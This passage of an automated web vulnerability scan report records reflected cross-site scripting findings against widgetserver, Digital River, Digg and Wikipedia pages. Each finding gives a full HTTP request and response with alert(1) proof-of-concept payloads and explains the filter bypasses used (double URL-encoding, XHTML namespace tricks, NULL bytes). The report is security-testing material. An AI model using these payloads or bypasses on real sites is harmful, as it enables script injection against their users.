Path:	/syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01b/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c8c38<a>b279ab99d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01bc8c38<a>b279ab99d94/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:22:50 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 1696

<response><widgets><widget><token>ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd</token><app-id>50c75bf0-9bd2-4e0d-b0e2-50ade412a01bc8c38<a>b279ab99d94</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload f7074%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e45eea47d5f9 was submitted in the REST URL parameter 18. This input was echoed as f7074<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>45eea47d5f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Request

GET /syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3f7074%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e45eea47d5f9/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:17 GMT
Expires: Wed, 07 Sep 2011 12:20:17 GMT
ObjectVersions: [Inst: req 10, db 10]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 3475

<response><widgets><widget><token>978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3f7074<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>45eea47d5f9</token><app-id>5e829
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 459b4<a>68c24a8a00c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95459b4<a>68c24a8a00c/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:20:01 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web02
Content-Length: 1696

<response><widgets><widget><token>978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3</token><app-id>5e8294c2-2294-4553-8c7c-48f8c9ba9b95459b4<a>68c24a8a00c</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321d/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 369f9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e954af5fe941 was submitted in the REST URL parameter 18. This input was echoed as 369f9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>954af5fe941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Request

GET /syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321d/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773369f9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e954af5fe941/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:25:20 GMT
Expires: Wed, 07 Sep 2011 12:24:20 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web15
Content-Length: 3473

<response><widgets><widget><token>117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773369f9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>954af5fe941</token><app-id>7c07d
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321d/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7a82<a>c05cd7645ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321de7a82<a>c05cd7645ad/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:24:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web03
Content-Length: 1696

<response><widgets><widget><token>117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773</token><app-id>7c07d8dd-4e86-4b13-a149-43e380ed321de7a82<a>c05cd7645ad</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 87d1a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efda49cd4e59 was submitted in the REST URL parameter 18. This input was echoed as 87d1a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fda49cd4e59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Request

GET /syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d75687d1a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efda49cd4e59/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:23:00 GMT
Expires: Wed, 07 Sep 2011 12:22:00 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 3473

<response><widgets><widget><token>b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d75687d1a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fda49cd4e59</token><app-id>8334e
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6ed4<a>4e2f98ce392 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36f6ed4<a>4e2f98ce392/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:41 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 1696

<response><widgets><widget><token>b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756</token><app-id>8334ea93-781f-4bce-bc32-094c3ddcee36f6ed4<a>4e2f98ce392</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 571a5%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee21715199ab was submitted in the REST URL parameter 18. This input was echoed as 571a5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e21715199ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Request

GET /syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f571a5%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee21715199ab/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:23:12 GMT
Expires: Wed, 07 Sep 2011 12:22:12 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web04
Content-Length: 3473

<response><widgets><widget><token>370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f571a5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e21715199ab</token><app-id>a4304
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cb5e<a>fa25a69a60 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf6cb5e<a>fa25a69a60/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:55 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web03
Content-Length: 1695

<response><widgets><widget><token>370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f</token><app-id>a43042dd-c472-4930-a919-f43bb2d1f2bf6cb5e<a>fa25a69a60</app-id><reg-id></reg-id><friendly-id><
...[SNIP]...

1.21. http://corporate.digitalriver.com/store [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://corporate.digitalriver.com
Path:	/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87700-->42ee04a8087 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0&87700-->42ee04a8087=1 HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145926231; fcPT=http%3A//corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs; fcC=X=C708273219&Y=1315145926358&FV=10&H=1315145926231&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=2&E=201359&F=0&I=1315145947293

Response

1.22. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/html/pbPage.Homepage

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da9c3--><script>alert(1)</script>dd29a7ec5c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--><script>alert(1)</script>dd29a7ec5c0=1 HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26

Response

1.23. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008affd"><script>alert(1)</script>0f044f917b8 was submitted in the REST URL parameter 1. This input was echoed as 8affd"><script>alert(1)</script>0f044f917b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%008affd"><script>alert(1)</script>0f044f917b8 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=2038971 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18218

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%008affd"><script>alert(1)</script>0f044f917b8.rss">
...[SNIP]...

1.24. http://en.wikipedia.org/wiki/Website#Product-_or_service-based_sites/x26amp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Website#Product-_or_service-based_sites/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %004394f<script>alert(1)</script>f633f3a958b was submitted in the REST URL parameter 2. This input was echoed as 4394f<script>alert(1)</script>f633f3a958b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

